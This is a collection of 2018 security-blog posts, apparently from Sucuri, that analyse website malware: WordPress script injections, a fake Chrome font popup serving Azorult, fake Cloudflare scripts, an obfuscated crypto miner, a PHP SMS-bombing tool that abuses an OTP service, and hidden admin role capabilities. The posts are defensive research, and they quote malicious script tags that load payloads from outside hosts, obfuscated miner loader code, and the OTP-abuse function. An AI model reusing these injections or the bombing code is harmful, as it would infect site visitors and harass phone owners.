Category: Website Malware Infections

Multi-Vector WordPress Infection from Examhome

This September, we’ve been seeing a massive infection wave that injects malicious JavaScript code into .js, .php files and the WordPress database.>

The script looks like this:

eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101,...skipped... 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125))

If you decode it, it injects scripts from hxxps://ads.voipnewswire[.]net/ad.js and later hxxps://examhome[.]net/stat.js?v=1.0.2. Some other related URLs are hxxps://cdn.allyouwant[.]online/main.js?t=c and hxxps://mp3menu[.]org/mp3.js,/b>.

Sometimes links to such scripts may be injected into wp_posts tables without any obfuscation whatsoever, e.g.

<script src='hxxps://cdn.examhome[.]net/cdn.js?ver=1.0.5' type='text/javascript'></script>

Many different attack vectors are being used in this campaign. The location of the malware varies a lot. The more common versions of this malware can be found in .js files that have jquery in their names. Or they are injected into settings of vulnerable WordPress themes and plugins, for example, very old tagDiv themes (Newspaper, Newsmag and their derivatives) or unpatched Smart Google Code Inserter plugin.

Sep 18, 2018 by Denis Sinegubko

“Google Fonts” popup leads to malware

A recent malware injection in a client\'s WordPress file was found to be targeting website visitors that were using the Google Chrome browser to access the infected website. It uses Javascript to detect the visitor\'s use of Google Chrome and then upon the visitor clicking it generates a popup notification which falsely claims that the visitor\'s Google Chrome is missing the HoeflerText font and that it is preventing the website from loading correctly.

It then instructs the website visitor to click a button on the popup notification - which then ends with a serious Azorult malicious .exe being downloaded to the website visitor\'s machine. It looks like this specific Azorult malware family was recently updated and it seems to currently have a detection rate of under 50% for major anti-virus softwares.


The \"HoeflerText\" font wasn't found.

The web page you are trying to load is displayed incorrectly, as it uses the \"HoeflerText\" font. To fix the error and display the text, you have to update the \"Chrome Font Pack\".

Step 1: In the bottom left corner of the screen you'll see the download bar. Click on the Chrome_Font.exe item.
Step 2: Press Yes(Run) in order to see the correct content on the web page.

Manufacturer:   Google Inc. All Rights Reserved
Current version:    Chrome Font Pack 53.0.2785.89
Latest version: Chrome Font Pack 57.2.5284.21

Update
Sep 10, 2018 by Luke Leal

Fake cloudflare injection

Seeing malicious campaigns using domain names that resemble big market players is not news anymore. This time I\'ll talk about the new redirects of cloudflare.pw.****

The domain, registered in 2017, has been used as a doorway to other suspicious content since then.

But this time it looks like they want to leverage the SSL adoption rush to hide the infection, since the script is loading content from https://*.contentssl.com.

The attackers are not only infecting files but it seems they are exploiting SQLinjection vulnerabilities to add the following javascript to the database too:

<script id="lg210a" src="https://cloudflare.pw/cdn/statslg30.js" type="text/javascript"></script>

The script id and the remote javascript file called can change. The file can be either statslg[30 or 50].js or statslelivros20.js. All those variations will load similar js. The only difference will be the final host, keeping the contentssl.com domain.

We also found fake Jquery scripts injected on infected sites, so, if you see any of those entries on your site, perform a full check on it.

Aug 8, 2018 by Fioravante Souza

Obfuscated JavaScript Crypto Miner

During an incident response investigation, we detected an interesting piece of heavily obfuscated JavaScript malware. Once decoded, Crypto Miners were ran on customers visiting the website.

By looking at the following malware this can be discouraging and frightening, but let’s review the malware code and see how the attacker cleverly created Crypto Miner code which was placed into the ./wp-content/themes/responsive/header.php file:

< script >$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")
[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")
[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+
($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")
[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)
[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_.
…...

The attacker placed the code at the top of a legit file. When the website is opened, it executed the JavaScript code and started mining Cryptocurrencies.

Let’s work through the malicious code step by step to see how it works.

The first step is to get the code to make more sense, so we are going to get it in a more readable format.

The malicious code was placed between the opening and closing JavaScript tags as indicated below:

< script >
    $ = ~[];
    $ = {
        ___: ++$,
        $$$$: (![] + "")[$],
        __$: ++$,
        $_$_: (![] + "")[$],
        _$_: ++$,
        $_$$: ({} + "")[$],
        $$_$: ($[$] + "")[$],
        _$$: ++$,
        $$$_: (!"" + "")[$],
        $__: ++$,
        $_$: ++$,
        $$__: ({} + "")[$],
        $$_: ++$,
        $$$: ++$,
        $___: ++$,
        $__$: ++$
    };
.....

Once the obfuscated malware has been decoded, it contained the following JavaScript code that will be used in the next phase of the Cryptocurrency.

If we look at the malicious code, we can see that the variable “el” contains a script object that will be pulling the final Crypto Miner payload from “web[.]clod[.]pw”

var el = document.createElement('script');el.src='https://web[.]clod[.]pw/js/YQHHAAUDYwBFglDXg0VSBVWyEDQ5dxGCBTN…….

In comparison, let’s look at the Crypto Miner payload that was pulled from “web[.]clod[.]pw” and see how it works.

This is a small piece of the malware that was pulled:

var _0xce82=['Y3VycmVudEpvYg==','WGZxVlU=','Z2V0VG90YWxIYXNoZXM=','dmxH','ZlBsVHA=','UmhsVEQ=','Tndoa0k=','RkhQZ2c=','Z2V0QWNjZXB0ZWRIYXNoZXM=','VXZV','WnZa','aHJjYWQ=','anB1cXI=','dGtMSkE=',
…...

Once we decode the content that was pulled from “web[.]clad[.]pw”, we see it contains many functions to check for crawlers and mobile devices and then decides whether it can start the Crypto miners:

if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop
|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i
|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.
(browser|link)|vodafone|wap|windows ce|xda|xiino/i [_0x2ce8('0x7d')](b) || 
/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|
as(te|us)|attw|au(di|\-m|r |s ….

After all the functions have been tested and verified, it will run the Cryptocurrency miner and execute the Crypto miner script by way of your computer hardware.The mining process will start mining Cryptocurrency for the hacker:

if (![]) {
    if (document[_0x2ce8('0xae')][_0x2ce8('0xaf')](/google|yandex|mail|vk.com|ask|bing/) || localStorage[_0x2ce8('0xb0')](_0x2ce8('0xab'))
 || sessionStorage && sessionStorage[_0x2ce8('0xb0')](_0x2ce8('0xab')))
 {
        localStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        sessionStorage[_0x2ce8('0xb2')]
(_0x2ce8('0xab'), 0x1);
        runMiner();

    }
} else {
    runMiner();
}
if (document[_0x2ce8('0x1d3')]) {
    var node = document[_0x2ce8('0x1d3')](_0x2ce8('0x1cd'));
    if (node && node[_0x2ce8('0x1d5')]) {
        node[_0x2ce8('0x1d5')]();
    }
}

If you think your website is infected, you can always trust the engineers from Sucuri to check it and clean it for you by visiting and subscribing at https://sucuri.net.

Aug 1, 2018 by Samuel Odendaal

How Some OTP Systems Can Be Used to...

I recently came across an interesting index.php file and its corresponding directory on a compromised website. I loaded it in a testing environment and immediately it was apparent that this malicious PHP file was different than your average spam tool:


GUI for this spamming tool. *Note - the "No Telp" telephone number field and the "Jumlah SMS" number of SMS field.

This particular malicious file\'s GUI stood out because it would send SMS(text) messages to a user-specified cellular telephone number. This isn\'t a standard operating procedure for most of the spam campaigns that I have encountered over the years, as they try to target as many email addresses, or phone numbers, as possible to increase the attack surface and the probability of a successful delivery.

AA further analysis of the code within the malicious spam tool file revealed further information:

public function Verif()
    {
        $url = "https://www.tokocash.com/oauth/otp";
        $no = $this->no;
        $type = $this->type;
        if ($type == 1) {
            $data = "msisdn={$no}&accept=";
        }elseif ($type == 2) {
            $data = "msisdn={$no}&accept=call";
        }
        $send = $this->sendC($url, null, $data);
        // echo $send;
        if (preg_match('/otp_attempt_left/', $send)) {
                print('OTP berhasil Dikirim!<br>');
            } else {
                print('OTP Gagal Dikirim!<br>');
            }
    }

sendC is a function defined earlier that just constructs a cURL request with special headers

After checking this PHP file's code, it's clear that the SMS spam message isn't actually being sent from the web server hosting the compromised website. Instead, the PHP file's coding would be executed from the web page previously shown. Then it would submit a specially crafted cURL request (saved as function sendC) to an Indonesian website that had an authentication system utilizing a OTP feature. The request sent to this website's OTP system would include parameters in the URL that include the victim's phone number and whether to perform the OTP two-factor authentication via phone call or SMS text message.

Apparently, it turns out that this PHP script is nothing more than a "prank" spam tool that will just continuously send SMS or phone calls to the victim's phone number until the OTP system starts rejecting the requests. It's an interesting method of "prank" spam in regards to how the SMS message is sent out. It doesn't use the malicious user's server nor the compromised website's hosting server but rather abuses a legitimate TokoCash/Tokopedia's authentication service to bombard the phone number. Notice in the screenshot spamming tool, the word bom, which means "bomb" in Indonesian.

I reached out to this Indonesian website to inform them of the prank spam issue with their OTP system so that they can hopefully implement some access control security to harden the OTP from this type of abuse.

Jul 25, 2018 by Luke Leal

Using Innocent roles to hide admin users

All across the internet we find guides and tutorials on how to keep your WordPress site secure, and they all approach the concept of user roles, but not many actually approach the capabilities of those roles.


The way the capabilities are handled on WordPress make it quite easy to change what each role is allowed to do.

How WordPress Sets Role Capabilities

To better understand, we need to first look at how WordPress manages the capabilities of the roles (what it is allowed to do, be it either add/remove users, create/delete posts, etc...). This is defined on the database, in the wp_options table option_name - wp_user_roles

The Risk

As we previously experienced, attackers are focusing on modifying serialized data within the wp_options table.Due to the feeling that webmasters understand the role “Subscriber” can’t do much about this becomes a serious problem attackers can leverage by simply modifying the wp_user_roles field on the wp_options table (see below):

(Note: The attackers first need to either compromise your website or gain database access in order to accomplish this.)

Attackers can quite easily give every subscriber full administration capabilities. Allow me to show you by using the plugin Capability Manager Enhanced

Any subscriber would be able to do pretty much whatever they wanted without you noticing because the list of users would still list the same number of administrators and subscribers.

The only problem with this is that “Subscriber” is a full administrator.

If we compare it with how it is supposed to look under the default role settings, we can see how damaging the small change can be for the website.

Conclusion

What if instead of just one subscriber, there were hundreds, even thousands? What if it was a shop and all your customers were now basically administrators?

WordPress does not have a mechanism to warn a Webmaster if roles other than the “Administrator” has those capabilities.Seeing as this can be set on any role present on your website, it’s very important to keep a sharp eye on the capabilities of each role (especially post-compromise) as it can be easily used as a backdoor to your website. Usage of plugins that manage the capabilities can make this easier for webmasters without technical know-how.

Jul 18, 2018 by Cesar Anjos

Hackers Are Just as Vulnerable as You

I came across some interesting defacement pages recently and noticed a peculiar JavaScript injection included within each source code of the defaced websites. As shown below, this JavaScript injection was peculiar as it seemingly provided no benefit to the hacker:

<script>
    ANCHORFREE_VERSION = "623161526"

<script type='text/javascript'>
    var _AF2$ = {
        'SN': 'HSSHIELD00TN',
        'IP': '69.22.172.11',
        'CH': 'HSSCNL000393',
        'CT': '0',
        'HST': '&sessStartTime=0&SFLAG=1&in=1423962910_84044764|d,1553137850|w,1553137850|m,1553137850|t&out=1423962910_23400718|d,305397307|w,305397307|m,305397307|t&NUM_VID=2&NUM_VID_TS=1423962310&bChrome=40&pv=5&clsBtnCnt=14&fav=8&fvidat=0&fvidv=0&accessLP=1',
        'AFH': 'hss306',
        'RN': Math.floor(Math.random() * 999),
        'TOP': (parent.location != document.location || top.location != document.location) ? 0 : 1,
        'AFVER': '3.69',
        'fbw': false,
        'FBWCNT': 0,
        'FBWCNTNAME': 'FBWCNT_CHROME',
        'NOFBWNAME': 'NO_FBW_CHROME',
        'B': 'c',
        'VER': 'nonus'
    };
    if (_AF2$.TOP == 1) {
        document.write("<scr" + "ipt src='http[:]//box.anchorfree.net/insert/insert.php?sn=" + _AF2$.SN + "&ch=" + _AF2$.CH + "&v=" + ANCHORFREE_VERSION + 6 + "&b=" + _AF2$.B + "&ver=" + _AF2$.VER + "&afver=" + _AF2$.AFVER + "' type='text/javascript'></scr" + "ipt>");
    }

The injected javascript code contains some details from the client\'s connection to the HotSpot Shield VPN server, then runs a javascript file from box.anchorfree.net

I haven\'t come across this type of content within any other forms of malware – just your typical Hacked by _____, or 0wned by _____ message, or an otherwise unwanted defacement of someone\'s website.

It only took a single Google search to determine that anchorfree.net is associated with the popular HotSpot Shield VPN, which has millions of downloads in the Google Play store alone (they also offer browser plugins for non-mobile users). They offer both a free and a paid version of their VPN service, however in the last year or so there have been demands for federal authorities to investigate them for deceptive practices.

(If you are curious about using a VPN for privacy reasons, or already are using one, then I\'d recommend checking out the official complaint here).

So what does this have to do with hackers and their defacement pages? Well, we know that in the majority of cases, the hacker is wanting to anonymize themselves. Nowadays, that usually involves using at least one VPN or more. Often times, the hackers that focus on defacements are more inexperienced and new, so they may lack the inherent suspicion one has to have when dealing with free services like HotSpot Shield VPN or any other free online services they must monetize to remain in operation. Their form of monetization is to inject JavaScript code into the browser requests of their non-paying clients (unsure about the Premium paid version), which is then used with additional JavaScript from a few different third-party domains:

document.write("<style type='text/css' title='AFc_css"
+_AF2$.RN+"' >.AFc_body"+_AF2$.RN+"{}.AFc_all"+_AF2$.RN+",a.AFc_all"+_AF2$.RN+":hover,a.AFc_all"+_AF2$.RN+"
:visited{outline:none;background:transparent;border:none;margin:0;padding:0;top:0;
left:0;text-decoration:none;overflow:hidden;display:block;z-index:666999;}</style>
<style type='text/css'>.AFhss_dpnone{display:none;width:0;height:0}</style>
<img src=\"about:blank\" id=\"AFhss_trk0\" name=\"AFhss_trk0\"
 style=\"display:none\" /><img src=\"about:blank\"id=\"AFhss_trk\" 
name=\"AFhss_trk\" style=\"display:none\"/><iframe src=\"http://anchorfree.us/quantcast.php\" style=\"width:0px;height:0px;display:none;\"></iframe>");

Just a small excerpt of the nearly 2,000 line JavaScript text showcasing some of the hidden CSS styling and also the setup of an invisible iFrame, which is a popular method of delivering malicious JavaScript payloads.

As this article isn't about HotSpot Shield VPN specifically, I won't go too in depth about it, but suffice it to say this JavaScript code from their controlled domains is using tracking images and injecting advertisements (some of which could be malicious) into their client's browser.

The purpose of explaining this, was to showcase how even hackers can be victims to one of the biggest hurdles known in website security and that is the human's ability to override otherwise secure settings. This is most commonly witnessed in a human downloading some type of software – in this case, a free VPN service –unknowingly exposing themselves to malicious or PUP (potentially unwanted programs). Another common method of the human factor failing otherwise secure settings is through social engineering.

In conclusion, one should be suspicious of products advertised as completely free and should try to understand the terms of service (SLA) so they are aware of what they may be giving away or exposed to in exchange for the free service. In these defacement cases, the inexperienced hacker relied upon a free VPN service that was unknowingly injecting JavaScript to his browser and so when they created the defacement page (likely through an online editor or browser interface) it caused the HotSpot Shield VPN JavaScript to get passed as text to the created defacement page rather than executed within the client's browser as is intended.

Jun 15, 2018 by Luke Leal